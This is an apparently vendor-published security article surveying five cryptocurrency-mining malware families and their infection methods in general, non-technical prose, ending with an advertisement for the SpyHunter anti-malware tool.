Web-based scripts and downloaded viruses deliver cryptocurrency miners that take advantage of the available system resources. The criminal operators have resorted into making multiple versions that include varied functionality. Our article lists the top 5 cryptocurrency miners that are actively attacking users on a global scale.
1. CoinHive Miner
The Coinhive makers advertise their product as a convenient method for web-based games or providing “extras” to users that voluntarily (or unknowingly) run the script. The programmers refer to the miner availability as being a method for providing in-game currency. Running the code by the users can give them the ability to remove ads, receive game credits, video streaming time and other services which may be limited to free or public accounts on web services. The Monero mining algorithm is designed to run well on consumer processors and graphic cards.
2. The WDF Miner
The WDF miner is another popular threat that is part of a Trojan instance that bears the same name. Once it has infiltrated the victim computer it installs itself in the Windows system folder. The WDF miner executable file masks itself as an application called “NVIDIA Driver Profile Updater” and WDF Sound. This is a clever strategy as a large part of the desktop users utilize components made by NVidia.
WDF miner is capable of launching processes of its own that can overtake the system resources thus generating crypto currency for the hackers. As a result of the performance overload the system may stop responding at certain times, videos may stutter and applications may not run correctly.
In addition the WDF miner delivers a Trojan instance which gives the attackers the ability to spy on the users in real time. The module is able to record their mouse movement and keystrokes as well. During the infection phase most Trojan also extract a lot of sensitive information from the compromised systems such as the following: installed hardware components, software installers and user settings.
3. Minergate.Exe (Bazon Trojan)
Miner malware including the Minergate instance are usually delivered together with another virus. In this case the Bazon Trojan is the counterpart assigned to assist the miner into infecting the designated targets.
The pair in the most popular case delivers the threat using email spam messages that utilize social engineering tricks. The widely used scenario of assuming the role of a famous company or a government institution is used to make the targets download and execute a file. It is masked as a letter, invoice or another document that may be of user interest. A wide range of formats can include the malware code including rich text documents, presentations or spreadsheets.
When the files are opened integrated scripts (macros) are run that seek to infect the compromised machines with the Minergate miner. The executable file which is then loaded into memory is copied to a system folder to prevent manual removal of the instance by deleting the payload.
The Bazon Trojan component modifies Windows registry values so that the Minergate code is loaded every time the computer boots. It is able to extract sensitive information from the computers including the following: system components, network status, stored account credentials, installed applications and etc.
4. WaterMiner Monero Miner
WaterMiner is a dangerous virus that has gained notoriety across the security community. A large-scale campaign was detected last month that impacted users worldwide. The worrying fact is that the operators behind the WaterMiner malware used a non-standard infection strategy. The dangerous code was found on gaming mods for famous games ike the Grand Theft Auto series distributed on gaming forums and communities.
The first versions were not detected by the majority of the security products. As a consequence the compromised machines were fully exposed to the hackers. Once the first infections have taken place an automated attack sequence is started. Based on the hardcoded commands the engine can be used to deliver several payloads at once, including the WaterMiner itself.
A total of 11 miner files are loaded into various temporary folders which makes it very hard to manually remove the threat. WaterMiner uses the available computer resources to mine the Monero currency. It is possible that a Russian hacker or criminal collective is behind the infections.
5. Browser Extension Cryptocurrency Miners
Computer hackers have started to bundle miner malware into counterfeit browser extensions. A recent example is the Quick Searcher CPU Miner which is featured on the software repositories of some of the most popular web browsers (such as Mozilla Firefox or Google Chrome). The virus plugins can also be installed via infected software installers downloaded from hacked or hacker-operated download portals. It is believed that some of the versions associated with these addons use code from famous instance like Coinhive. At the onset of infection a series of prerequisite tasks can be executed to prepare the miner or deploy additional payloads (Trojans, adware or ransomware).
The Consequences of the Cryptocurrency Miners Infections
Crypto miners are the latest hit in the hacker communities. They take advantage of the numerous infiltration strategies that are used by the viruses. In most cases the miners themselves are not delivered stand alone but come rather as a secondary payload during the infection sequence of most viruses.
Notable exceptions are when hackers bundle them in web pages, ad networks or browser hijacker code. This is an intentional act. In other cases site administrators can include the code in order to generate revenue. This can be interpreted as a sort of donation from the site visitors. A notable case was a Pirate Bay proxy site that included a miner in its home page. Whenever a site wanted to access the torrent tracker their computer resources were used to run the software and thus generate revenue for the site operators.
The miners can also be delivered in mass infection strategies, the most popular case is the use of vulnerability exploits. A large-scale attack was initiated in May 2017 when hacker collectives launched a worldwide malware attack set against unpatched Microsoft Windows web servers. The key feature when it comes to the miners is that they can be used to gain not only Bitcoins but also alternative currency such as Monero or Ethereum.
As always we urge computer users to rely on a trusted and quality security solution which is capable to protect their systems and remove active infections with a few mouse clicks.
Spy Hunter scanner will only detect the threat. If you want the threat to be automatically removed, you need to purchase the full version of the anti-malware tool.Find Out More About SpyHunter Anti-Malware Tool / How to Uninstall SpyHunter